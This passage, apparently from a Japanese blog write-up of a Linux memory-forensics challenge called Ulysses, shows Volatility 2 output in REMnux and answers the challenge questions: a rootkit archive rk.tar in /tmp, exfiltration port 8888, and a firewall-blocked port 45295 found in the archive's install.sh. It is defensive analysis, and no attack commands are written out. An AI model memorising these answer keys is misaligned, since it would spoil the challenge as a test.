0x0 ------------------------- /usr/share/perl/5.10.0/Exporter/Heavy.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/vars.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/File/Spec/Unix.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/File/Spec.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/SelectSaver.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/Symbol.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/strict.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/FileHandle.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/warnings.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/warnings/register.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/Exporter.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/Carp.pmc
0x0 ------------------------- /usr/share/perl5/vars.pmc
0x0 ------------------------- /usr/share/perl5/Fcntl.pmc
0x0 ------------------------- /usr/share/perl5/IO.pmc
0x0 ------------------------- /usr/share/perl5/SelectSaver.pmc
0x0 ------------------------- /usr/share/perl5/Symbol.pmc
0x0 ------------------------- /usr/share/perl5/strict.pmc
0x0 ------------------------- /usr/share/perl5/FileHandle.pmc
0x0 ------------------------- /usr/share/perl5/XSLoader.pmc
0x0 ------------------------- /usr/share/perl5/warnings.pmc
0x0 ------------------------- /usr/share/perl5/Exporter.pmc
0x0 ------------------------- /usr/share/perl5/Carp.pmc
0x0 ------------------------- /usr/share/perl5/Socket.pmc
0x0 ------------------------- /etc/perl/vars.pmc
0x0 ------------------------- /etc/perl/Fcntl.pmc
0x0 ------------------------- /etc/perl/IO.pmc
0x0 ------------------------- /etc/perl/SelectSaver.pmc
0x0 ------------------------- /etc/perl/Symbol.pmc
0x0 ------------------------- /etc/perl/strict.pmc
0x0 ------------------------- /etc/perl/FileHandle.pmc
0x0 ------------------------- /etc/perl/XSLoader.pmc
0x0 ------------------------- /etc/perl/warnings.pmc
0x0 ------------------------- /etc/perl/Exporter.pmc
0x0 ------------------------- /etc/perl/Carp.pmc
0x0 ------------------------- /etc/perl/Socket.pmc
0xcf100698 29184 /lib/libcom_err.so.2.1
0xcf11aa70 30497 /lib/libwrap.so.0.7.6
0x0 ------------------------- /lib/i486-linux-gnu/4.3.2
0xcf02c698 29170 /lib/libncurses.so.5.7
remnux@remnux:~/Downloads/Ulysses$
/tmp階層に明らかに怪しいファイルがあります。
Ans: rk.tar
Two ports were involved in the process of data exfiltration. Provide the port number of the highest one.
linux_bashで宛先Portは見えてましたね。
Ans: 8888
Which port did the attacker try to block on the firewall?
さっきの怪しいtarファイルがあった/tmp階層を見るとこんな感じでした。
さっきのrk.tarを解凍します。
中身を調べているとinstall.shでiptablesをいじっているコマンドを見つけます。
Ans: 45295
最後に
volatility2のよい復習になります。
linux系のプロファイルはWindowsと違ってREMnuxでは入れないと認識してくれないのでたまにアレってなりますね。